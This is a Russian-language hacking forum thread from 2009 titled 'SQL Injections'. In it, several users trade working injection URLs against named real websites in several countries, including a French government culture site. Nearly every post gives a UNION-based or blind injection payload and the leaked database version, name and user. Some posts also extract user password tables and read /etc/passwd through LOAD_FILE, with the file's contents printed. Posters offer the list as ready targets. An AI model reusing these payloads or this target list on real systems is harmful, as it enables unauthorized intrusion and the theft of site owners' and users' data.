SQL Инъекции

f1ng3r · 1 Mar 2009

Code:
http://www.bmwstyle.ru/bmw.php?module=news&news_type=cur_id&news_id=-1+union+select+1,concat_ ws(0x3a,version(),database(),user()),3,4,5--
Database Version : 5.0.67-0ubuntu6
Database name : www_bmwstyle_ru
User name : bmwstyle@localhost

S0ulVortex · 1 Mar 2009

paraisobahamas.com PR=3
Code:
http://paraisobahamas.com/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
version: 4.1.22-standard-log
user: paraisob_admin@localhost
database: paraisob_cms

-m0rgan- · 1 Mar 2009

Продолжение славного дела

Продолжение славного дела
Code:
http://www.danishdesignwatches.eu/prod_detail.php?id=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(version(),user(),database()),8,9,10,11,12,13,14,15,16,17--
версия/юзер/бд:
Code:
[email protected]
----------------------------------------------------------
Code:
http://www.granietbeurs.nl/website.php?id=-1+union+all+select+convert(concat_ws(version(),user(),database())+using+latin1)--
версия/юзер/бд:
Code:
[email protected]_gran
----------------------------------------------------------
Code:
http://www.spsrasd.info/fr/detail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7--
версия/юзер/бд:
Code:
[email protected]
---------------------------------------------------------
Code:
http://www.digitaccess.fr/category.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--
версия/юзер/бд:
Code:
[email protected]
--------------------------------------------------------
Code:
http://www.cmgolf.fr/product.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7,8,9--
версия/юзер/бд:
Code:
[email protected]_7etch6-logmy67521
-------------------------------------------------------
Code:
http://www.serema.fr/produit.php?id=-1+union+all+select+0,1,convert(concat_ws(version(),user(),database())+using+latin1),3,4,5,6--
версия/юзер/бд:

смотрим в свойствах картинки
Code:
[email protected]_fr
--------------------------------------------------
Code:
http://www.eliotrope.fr/theme.php?id=-1+union+all+select+0,concat_ws(version(),user(),database())--
версия/юзер/бд:
Code:
[email protected]_7etch8-logeliotrope_base
---------------------------------------------------------
Code:
http://www.fetedelamusique.culture.fr/page.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7--
версия/юзер/бд:
Code:
[email protected]
--------------------------------------------------------
Code:
http://design-facade.fr/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7--
версия/юзер/бд:
Code:
[email protected]
--------------------------------------------------------
Code:
http://www.cshm-schm.ca/fr/event.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--
версия/юзер/бд:
Code:
[email protected]
Думаю на первое время вам хватит
-----------------------------------------------------
The End!

f1ng3r · 1 Mar 2009

Pagerank: 6
тИЦ: 2300
Code:
http://www.sibfair.ru/?current=262&nid=-1+union+select+1,aes_ decrypt(aes_encrypt( concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4,5,6--
Database Version : 4.1.16
Database name : fair
User name : fair@localhost

Gorev · 1 Mar 2009

http://www.capitaneanubebi.ro/Web/cjasbr/pagina.php?id=-3+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

Database Version: 5.0.45-log
Database name: cjasbr
User name: [email protected]

mailbrush · 1 Mar 2009

Code:
http://www.webwisesage.com/maxwrite/diarypage.php?did=-9999999999999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17
user():database():version()
[email protected]:xwebwisesage-wws:4.0.2

Это уязвимый двиг: http://forum.antichat.ru/showpost.php?p=1144179&postcount=98
PS: Сорри, не увидел, что openwds уже был...

Gorev · 1 Mar 2009

http://www.voxmarsign.ro/produse-detalii.php?id=-54+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16--&t=8

Database Version: 5.0.45-log
Database name: voxmar_sign
User name: [email protected]

S0ulVortex · 1 Mar 2009

www.fresno-shopping.com PR=2
Code:
http://www.fresno-shopping.com/news.php?ax=v&n=13&id=8&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
version: 4.1.22-standard-log
user: fresnosh_user@localhost
database: fresnosh_cms

www.manchester-center.com PR=4
Code:
http://www.manchester-center.com/news.php?ax=v&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
version: 4.1.22-standard
user: manchest_user@localhost
database: manchest_cms

mailbrush · 1 Mar 2009

Code:
http://www.robkall.com/maxwrite/diarypage.php?did=-999999+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
user:database:version
opednews_vidya@localhostpednews_pearl:4.1.22-standard-log
Code:
http://www.awakeningpath.com/maxw/diarypage.php?did=-999999999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17
user:database:version
[email protected]:xawakeningpath-awaken:5.0.70-log

Gorev · 1 Mar 2009

http://www.continentalhotels.ro/index.php?page=hotel&id_hotel=3+AND+ASCII(SUBSTRING((select+version()),1,1))>x--

x=52,46,49,46,50,48,45,108,111,103

http://www.continentalhotels.ro/index.php?page=hotel&id_hotel=3+AND+ASCII(SUBSTRING((select+database()),1,1))>x--

x=115,104,99,111,110,116,105,110,101,110,116,97,108,104,111,116,101,108,115,114,111

http://www.continentalhotels.ro/index.php?page=hotel&id_hotel=3+AND+ASCII(SUBSTRING((select+user()),1,1))>x--

x=99,111,110,116,105,110,101,110,116,97,108,104,111,114,111,64,56,53,46,57,46,50,50,46,50,51,54

Version : 4.1.20-log
Database : shcontinentalhotelsro
User : [email protected]

f1ng3r · 1 Mar 2009

Ленинградская торгово-промышленная Палата

Pagerank: 5
тИЦ: 700
Code:
http://www.lotpp.ru/rnews.php?id=-1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8--
Database Version : 4.1.19-log
Database name : lotpp2
User name : lotpp@localhost

Gorev · 1 Mar 2009

http://www.blacklist-online.ro/?mn=articole&id=-37+union+select+1,2,concat_ws(0x3a,version(),database(),user())

Database Version: 5.0.32-Debian_7etch1~bpo.1-log
Database name: saxas_blacklist
User name: [email protected]

mailbrush · 1 Mar 2009

Code:
http://arainia.com/software/gizmo/overview.php?nID=-4+union+select+concat(0x3C68313E,user(),0x3a,database(),0x3a,version(),0x3C2F68313E),2,3--
user:database:version
[email protected]:xawakeningpath-awaken:5.0.70-log
Code:
http://www.espana.ru/rus/index.php?did=-99999999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8
user:database:version
espana@localhost:espana:4.0.27-log

Gorev · 1 Mar 2009

http://www.transylvania-jobs.com/?mn=oferta&id=-13+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--

Database Version: 5.0.32-Debian_7etch1~bpo.1-log
Database name: saxas_transylvan
User name: [email protected]

f1ng3r · 1 Mar 2009

Pagerank: 3
тИЦ: 1300
Code:
http://www.poezia.ru/newsline2.php?sid=-1+union+select+concat_ ws(0x3a,version(),database(),user()),2,3,4--
Database Version : 5.0.27
Database name : u32983
User name : u32983@localhost

юзвери:
Code:
http://www.poezia.ru/newsline2.php?sid=-1+union+select+concat _ws(0x3a ,uname,pass),2,3,4+from+users+limit+0,1--

mailbrush · 1 Mar 2009

Code:
http://www.mingei.org/exhibitions/detail.php?EID=-99999999+union+select+1,2,concat(0x223E,user(),0x3a,database(),0x3a,version(),0x3C212D2D)/*
user():database():version()
mingeior_web@localhost:mingeior_1011:4.1.22-standard

-m0rgan- · 1 Mar 2009

Вот небольной сбор багов на конец дня
Налетай
Code:
http://www.v-p-c.fr/article.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3--
юзер/версия/бд:
Code:
[email protected] :
-------------------------------------------------------------
Code:
http://www.fpt-soft.com/FR/newsDetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8--
юзер/версия/бд:
Code:
[email protected]_fpt_soft_com
------------------------------------------------------------

по сути тот же проект, только с другим доменным именем
Code:
http://www.fsoft.com.vn/FR/newsDetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8--
юзер/версия/бд:
Code:
[email protected]_fpt_soft_com
-------------------------------------------------------------
Code:
http://www.scenarts.fr/fiche_spectacle.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--
юзер/версия/бд:
Code:
[email protected]
-------------------------------------------------------------
Code:
http://www.rdsm.be/fr/news.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3--
юзер/версия/бд:
Code:
[email protected]
----------------------------------------------------------------
Code:
http://www.mielapiculteur.fr/faq2.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9,10--
юзер/версия/бд:
Code:
[email protected]
-----------------------------------------------------------------
Code:
http://www.sitetic.fr/prod_detail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9,10--
юзер/версия/бд:
Code:
[email protected]
----------------------------------------------------------------
The End!

Gorev · 1 Mar 2009

http://www.ludmilacorlateanu.com/news_details.php?id=-28+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*

Database Version: 5.0.32-Debian_7etch1~bpo.1-log
Database name: saxas_lc
User name: [email protected]

AkyHa_MaTaTa · 2 Mar 2009

tv.sinn.ru - ВолгаТелеком

PHP:

http://tv.sinn.ru/view_all_topic.php?m_id=33955+union+select+1,2,concat_ws(0x3A,user(),version(),database()),4,5,6,7+--+

tv@localhost
4.0.18-log
tv

f1ng3r · 2 Mar 2009

Pagerank: 5
тИЦ: 700

Code:

http://www.nordicbook.ru/detailed.php?id=-1+union+select+concat_ ws(0x3a,version(),data base(),user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--&type=Books

Database Version : 4.1.22
Database name : db_nordic_1
User name : [email protected]

--------------------------------------------#

Pagerank: 4
тИЦ: 275

Code:

http://gamestation.ru/station.php?dir_id=71&prod_id=12476+union+select+1,2,3, concat _ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--

Database Version : 5.0.67
Database name : Gamestation
User name : root@localhost

юзвери:

Code:

http://gamestation.ru/station.php?dir_id=71&prod_id=12476+union+select+1,2,3,concat_ ws(0x3a,user_id,email,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+from+ps_users--

читаем /etc/passwd :

Code:

http://gamestation.ru/station.php?dir_id=71&prod_id=12476+union+select+1,2,3,LOAD_FILE(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43, 44,45,46,47,48,49,50,51--

Code:

# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06
20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/usr/local/bin/
bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner
of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries
Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty
Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/
usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/
usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/
clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default
User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind
Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-
user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep
user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/
var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/
spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post
Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World
Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/
nologin mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
dovecot:*:143:143:Dovecot User:/var/empty:/usr/sbin/nologin
volos:*:1000:0::/home/volos:/usr/local/bin/bash

--------------------------------------------#

Code:

http://alterego.of.by/library/showarticle.php?id=71+union+select+1,concat_ ws(0x3a,version(),d atabase(),user()),3,4,5,6--

Database Version : 4.0.27-log
Database name : alteregotutby
User name : [email protected]

SQL Инъекции

f1ng3r [забытый полк]

S0ulVortex Elder - Старейшина

-m0rgan- Elder - Старейшина

f1ng3r [забытый полк]

Gorev Level 8

mailbrush Well-Known Member

Gorev Level 8

S0ulVortex Elder - Старейшина

mailbrush Well-Known Member

Gorev Level 8

f1ng3r [забытый полк]

Gorev Level 8

mailbrush Well-Known Member

Gorev Level 8

f1ng3r [забытый полк]

mailbrush Well-Known Member

-m0rgan- Elder - Старейшина

Gorev Level 8

AkyHa_MaTaTa Elder - Старейшина

f1ng3r [забытый полк]

Useful Searches

SQL Инъекции

f1ng3r [забытый полк]

S0ulVortex Elder - Старейшина

-m0rgan- Elder - Старейшина

f1ng3r [забытый полк]

Gorev Level 8

mailbrush Well-Known Member

Gorev Level 8

S0ulVortex Elder - Старейшина

mailbrush Well-Known Member

Gorev Level 8

f1ng3r [забытый полк]

Gorev Level 8

mailbrush Well-Known Member

Gorev Level 8

f1ng3r [забытый полк]

mailbrush Well-Known Member

-m0rgan- Elder - Старейшина

Gorev Level 8

AkyHa_MaTaTa Elder - Старейшина

f1ng3r [забытый полк]